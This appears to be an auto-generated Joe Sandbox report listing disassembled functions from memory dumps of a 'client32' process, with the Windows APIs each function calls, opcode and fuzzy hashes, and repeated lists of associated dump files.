Opcode Fuzzy Hash: db31c45bf9382b5e9960c4961a9dfe3fe824b9136a4ad7c62bc5c4ee202b4110
Instruction Fuzzy Hash: 36E001B1901B108F87B0CF3AA50464ABEF0BB086503118A2E949EC3A10E330A5858F84

Function 110259A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll), ref: 110259A8

Strings

psapi.dll, xrefs: 110259A1

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
Instruction ID: e7d689bb3e0256121f65424e75b73c3f9b38c7483ec2d975ead7d22227fa1e2d
Opcode Fuzzy Hash: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
Instruction Fuzzy Hash: 7DE009B1A01B118FC3B0CF3A9544646BAF0BB186103118A3ED0AEC3A00E330A5448F90

Function 11015160 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(nslsp.dll), ref: 1101516E

Strings

nslsp.dll, xrefs: 11015163

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: nslsp.dll
API String ID: 1029625771-3933918195
Opcode ID: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
Instruction ID: 0f85fd80076d2b40817f9a73906c67b3183ec9e0361306ecdf77c2e20fb6d995
Opcode Fuzzy Hash: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
Instruction Fuzzy Hash: 9AC092B57022368FE3645F98AC585C6FBE4EB09612351886EE5B6D3704E6F09C408BE2

Function 11073E70 Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11073ECF
FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11073F39

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FreeLibrary_memset
String ID:
API String ID: 1654520187-0
Opcode ID: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
Instruction ID: a025be61f5cc20f5ad5b88b5485e82962b2b8b991e0ff8e486065cca72918f8b
Opcode Fuzzy Hash: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
Instruction Fuzzy Hash: 8A21B076E00228A7DB10DE59EC45BEFFBB8FB44314F0041AAF9099B240E7759A54CBE1

Function 11087510 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1108752F
InitializeCriticalSection.KERNEL32(?,?,1117CF74,?), ref: 110875A0

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection_memset
String ID:
API String ID: 453477542-0
Opcode ID: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
Instruction ID: 75295544d9195e04375e6fd21bc40551df4152833ee3a01bc0b81666db33725f
Opcode Fuzzy Hash: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
Instruction Fuzzy Hash: 711157B0902B148FC3A4CF7A89816C6FAE5BB48315F90892E96EEC2200DB716564CF91

Function 11140AB0 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11140AD1
ExtractIconExA.SHELL32(?,00000000,00090407,00140363,00000001), ref: 11140B08

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExtractFileIconModuleName
String ID:
API String ID: 3911389742-0
Opcode ID: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
Instruction ID: fbd1f7f6eca67a3d4699d4d052ae62d0c626dfd316a41b503206f924cf5b890f
Opcode Fuzzy Hash: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
Instruction Fuzzy Hash: EFF02478A4511C9FEB48CFE4CC86FBDF769E784708F808269EE12871C4CE7029488740

Function 11160535 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF

__lock_file.LIBCMT ref: 1116057C
__fclose_nolock.LIBCMT ref: 11160587

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2959217138-0
Opcode ID: 9c94bd5ad8adf114722855a36b49f4cfe2d274427d0abc081df420240f29e7a8
Instruction ID: c99a5f40794e7bd6d5a1a4a2a70ed171e4b9561b0896b3e5cf790a4aaee0ba1f
Opcode Fuzzy Hash: 9c94bd5ad8adf114722855a36b49f4cfe2d274427d0abc081df420240f29e7a8
Instruction Fuzzy Hash: A7F09035D11B179AD710AB7598047AEFBB86F0133CF118208C4649A1D0CBFEAA21DB96

Function 685A6C1E Relevance: 3.0, APIs: 2, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 685A6C26
Sleep.KERNEL32(00000064), ref: 685A6C5B

Part of subcall function 685A6940: GetTickCount.KERNEL32 ref: 685A6950

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$Sleep
String ID:
API String ID: 4250438611-0
Opcode ID: 3ffbe2ba07ed7edafacd5dee2bb539a8235f082dc1d35ef028f6fdfd2a9b8d15
Instruction ID: 661e61dc1211ccd4f13e12e72c8a70072f1f8168924ab5dea67af204b1cc2986
Opcode Fuzzy Hash: 3ffbe2ba07ed7edafacd5dee2bb539a8235f082dc1d35ef028f6fdfd2a9b8d15
Instruction Fuzzy Hash: 77F05431640304CECF14EB7889983ACB6E1EB92315F92012ADA229A680E774CC80C746

Function 685963A0 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON

Download Yara Rule

APIs

WSACancelBlockingCall.WSOCK32 ref: 685963A9
Sleep.KERNEL32(00000032), ref: 685963B3

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: BlockingCallCancelSleep
String ID:
API String ID: 3706969569-0
Opcode ID: cf3026702103ff340213a672aac302d0c12d1cbce9ad8d3bb249a37ebd04398e
Instruction ID: 9c7c155be69afa6d0bd9e6666db90ee95b709ffd67e9b265f4dba9f265acbfe9
Opcode Fuzzy Hash: cf3026702103ff340213a672aac302d0c12d1cbce9ad8d3bb249a37ebd04398e
Instruction Fuzzy Hash: 80B092782A22A069AF40137109062BA20C80FD5287FE104602B59CA085EF20C504A5A1

Function 11141510 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,75C07310), ref: 11141457

Part of subcall function 1116076B: __fsopen.LIBCMT ref: 11160778

GetLastError.KERNEL32(?,0224B858,000000FF,?), ref: 11141545
Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0224B858,000000FF,?), ref: 11141555

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
String ID:
API String ID: 3768737497-0
Opcode ID: 81746d2f9acf91c020a5a3f6663b8b5426944b6bd56996d575389eba168b1fdf
Instruction ID: 7e8c35b226adcaf9db255fe0cc88c7d1a69018d15e21d4c5589b92f150ef4e8a
Opcode Fuzzy Hash: 81746d2f9acf91c020a5a3f6663b8b5426944b6bd56996d575389eba168b1fdf
Instruction Fuzzy Hash: 19114876F00615ABDB119F90CDC0AAEF778EF46A19F244164EC06DB200E734BE518BE2

Function 11010980 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 11010A34

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_
String ID:
API String ID: 3382485803-0
Opcode ID: f6d0a54566054b589c6c4caa2954ea7599f026ea747ae3b3f194ddc99e0da180
Instruction ID: a25f3913c8117ba577326b804e25134151bce6e6eea091deb2a1df2ca1a14b49
Opcode Fuzzy Hash: f6d0a54566054b589c6c4caa2954ea7599f026ea747ae3b3f194ddc99e0da180
Instruction Fuzzy Hash: 7F516D75A00645DFDB04CF98C980AADBBF6FF89318F24829DD5459B389C776E902CB90

Function 1100E1E0 Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 1100E23A

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 5fa8f17be554a0f05a8c027d360aa03ad4c45c20bf0e8ea4a2cc0b0f6e1ef9b5
Instruction ID: 39b51422fadbad7160f5098cdb9dd12f31e08204b6f2b6def03bbff7de3af923
Opcode Fuzzy Hash: 5fa8f17be554a0f05a8c027d360aa03ad4c45c20bf0e8ea4a2cc0b0f6e1ef9b5
Instruction Fuzzy Hash: 8F214F75D00269EFEB40CE69C98059D7BF5EF45364F1081AAEC29EB241D774DE508B90

Function 1113F670 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,75BF8400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
Instruction ID: 10a2649455158eed3fdc33ccecd10e2613defaba2ffe2c5b463718ad866645ae
Opcode Fuzzy Hash: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
Instruction Fuzzy Hash: 4211ECB67242475FEB11CD24D690B9EF756EFC5339F20812EE58587518D2319882CB53

Function 110F8740 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,1117CF74), ref: 110F876D

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
